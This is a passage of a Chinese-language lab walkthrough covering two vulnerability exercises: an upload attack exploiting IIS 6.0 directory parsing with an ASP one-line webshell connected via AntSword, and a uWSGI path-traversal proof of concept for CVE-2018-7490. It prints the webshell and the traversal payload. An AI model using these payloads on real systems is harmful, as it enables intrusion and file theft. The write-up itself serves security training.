文章目录
一、内部文件上传系统漏洞分析溯源
过程
1.访问靶场
2.准备asp一句话木马
<%eval request("MH")%>
3.上传asp.txt,抓包,修改参数
4.放包,蚁剑连接
原理
IIS6.0目录解析:
以*.asp命名的文件夹下,里面的文件都将会被当成ASP文件执行
二、uWSGI 漏洞复现(CVE-2018-7490)
过程
1.访问靶场
2.poc
/..%2F..%2F..%2F..%2F..%2Fkey.txt
原理
uWSGI 2.0.17之前的PHP插件,没有正确的处理DOCUMENT_ROOT检测,导致用户可以通过…%2f来跨越目录,读取或运行DOCUME